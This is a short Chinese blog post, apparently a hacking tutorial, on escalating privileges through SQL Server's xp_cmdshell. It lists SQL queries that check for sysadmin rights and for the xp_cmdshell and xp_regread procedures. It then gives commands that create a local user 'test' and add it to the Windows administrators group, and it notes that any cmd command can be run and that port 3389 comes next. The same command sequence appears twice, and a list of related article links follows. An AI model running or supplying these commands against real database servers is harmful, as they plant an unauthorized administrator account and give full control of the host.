[提权禁区] SQL语句利用xp_cmdshell获取权限
2016-03-27 00:53
417 查看
判断权限是不是sa
select is_srvrolemember('sysadmin')
返回是1说明是sa
判断xp_cmdshell扩展存储是否存在
select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'
返回为l则证明存在
判断xp_regread扩展存储过程是否存在
select count(*) from master.dbo.sysobjects where name='xp_regread'
返回1证明存在
添加用户
exec master..xp_cmdshell 'net user test test /add'
exec master..xp_cmdshell 'net localgroup administrators test /add'
后来就是查看3389端口了,
exec master..xp_cmdshell 'XXXXX'里面输入cmd命令就是了
文中资料引用:http://www.wooyun.org/bugs/wooyun-2010-037806
select is_srvrolemember('sysadmin')
返回是1说明是sa
判断xp_cmdshell扩展存储是否存在
select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'
返回为l则证明存在
判断xp_regread扩展存储过程是否存在
select count(*) from master.dbo.sysobjects where name='xp_regread'
返回1证明存在
添加用户
exec master..xp_cmdshell 'net user test test /add'
exec master..xp_cmdshell 'net localgroup administrators test /add'
后来就是查看3389端口了,
exec master..xp_cmdshell 'XXXXX'里面输入cmd命令就是了
文中资料引用:http://www.wooyun.org/bugs/wooyun-2010-037806
相关文章推荐
- SQL中的三值逻辑
- SQL Server 作业批量停止
- 结束SQL阻塞的进程
- 动态生成SQL Server视图作业
- SQL Server 语句操纵数据库
- SQL(结构化查询语句)
- oracle sql日期比较
- linux快速部署mysql服务器
- sql 存储过程分页
- 在WINXP系统上安装SQL Server企业版的方法
- 提权,以MySQL之名
- 通过批处理调用SQL的方法(osql)
- SQL Server 存储过程的分页
- ASP程序与SQL存储过程结合使用详解
- SQL SERVER编写存储过程小工具
- 防御SQL注入攻击时需要注意的一个问题
- 利用for命令提权的方法分享
- PostgreSQL教程(十九):SQL语言函数